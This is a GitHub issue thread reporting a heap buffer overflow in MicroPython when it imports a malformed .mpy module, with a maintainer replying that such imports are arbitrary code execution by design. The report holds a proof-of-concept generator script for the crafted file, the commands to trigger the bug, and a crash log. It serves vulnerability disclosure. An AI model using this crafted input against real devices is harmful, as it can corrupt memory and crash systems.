micropython/micropython #13002: heap-buffer-over-flow(.mpy): from importing malformed npy module

junwha0511, 2023-11-17:
Hi all, I'm Junwha Hong from S2Lab in UNIST. we found a vulnerability from micropython.

Because this bug is complicated, it would be better to read this report from PDF report.
[heap-buffer-overflow #1.pdf](https://github.com/micropython/micropython/files/13390053/heap-buffer-overflow.1.pdf)
***Thank you for taking the time to review our bug report! :)***

# Summary

- **OS**: Ubuntu 22.04
- **version**: micropython@a00c9d56db775ee5fc14c2db60eb07bab8e872dd
- **port**: unix
- **detection tool**: our custom tool, not disclosed yet
- **contribution**: Junwha Hong and Wonil Jang @S2Lab, UNIST
- **description**:
    - Importing malformed .mpy module leads to buffer overflow at byte code executor
    - A code chunk was allocated at persistentcode.c:249
    - The chunk was accessed at at vm.c:311 by code pointer ip
        - which was pre-determined at `mp_setup_code_state_helper` (bc.c:140)

# PoC Generation
PoC can be generated from bellow code, bof_module_gen.py
```cpp
try:
    import sys, io, os

    sys.implementation._mpy
    io.IOBase
    os.mount
except (ImportError, AttributeError):
    print("Error")
    raise SystemExit

mpy_arch = sys.implementation._mpy >> 8

# these are the test .mpy files
valid_header = bytes([77, 6, mpy_arch, 31])
# fmt: off
user_files = {
    # bad architecture (mpy_arch needed for sub-version)
    '/mod1.mpy': valid_header + (
        b'\x02' # n_qstr
        b'\x00' # n_obj
        b'\x02' # 2 children
         b'\x42' # 8 bytes, no children, viper code
                b'\x00[x00' # dummy machine code
    ),
}
# fmt: on

with open("bof_module.mpy", "wb") as f:
    f.write(user_files['/mod1.mpy'])
```

```cpp
micropython bof_module_gen.py
```

```cpp
micropython -c "import bof_module"
```

# Crash Log

```bash
#0 0x5555557855f4 in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c
#1 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42
#2 0x555555777269 in do_load /home/qbit/testing-2023/micropython/ports/unix/../../py/builtinimport.c
#3 0x555555776022 in process_import_at_level /home/qbit/testing-2023/micropython/ports/unix/../../py/builtinimport.c:512:9
#4 0x555555776022 in mp_builtin___import___default /home/qbit/testing-2023/micropython/ports/unix/../../py/builtinimport.c:607:35
#5 0x5555557276b0 in mp_import_name /home/qbit/testing-2023/micropython/ports/unix/../../py/runtime.c:1525:12
[... 350 lines cut ...]
    - at vm.c:311
    - which was determined at `mp_setup_code_state_helper` (bc.c:140)

# Patch

To prevent this kind of malformed input leading to the buffer overflow, we need to move the length related parsing functions to parsers and enforcing the validation logic while reading the file.

# Discussion

We think you already tested this kind of features in the tests of tests/micropython/import_mpy*.py, but it seems it’s not sufficient.

Also, this bug can be seemed not that critical because importing this module produce “NotImplementedError: opcode”, but it’s actually very critical because the out-of-bounds occurs before the NotImplementedError, and it means that this buffer-over-flow can affect runtime if a user has code like:

```python
try:
    import module_A # module_A is malformed by attacker
except:
    import module_A_alternative

...

# Normal routine
```

***Thank you for taking the time to review our bug report! :)***

projectgus, 2023-11-21:
Hi @junwha0511,

This one has a simlar response to #13003 and #13004:

Importing a .mpy file is, by definition, arbitrary code execution. If an attacker has the ability to create a custom .mpy file then they can write Python code to read or write any of the memory that MicroPython can access (using uctypes, or the machine.mem8/16/32 functions). They don't need to hand-craft the file format, they can just compile some Python code to do this.

If you find a bug where mpy-cross produces invalid .mpy bytecode, please report it as this would be a valid bug for us to fix.

projectgus, 2023-11-21:
You may ask: why not do more defensive programming in the runtime, anyhow? Even an accidental corruption of the .mpy file could potentially cause a memory corruption issue like this, without any attacker.

The reason for this is code size, MicroPython has to run on size constrained systems so the runtime is deliberately kept as small as possible.

closed 2023-11-21 by projectgus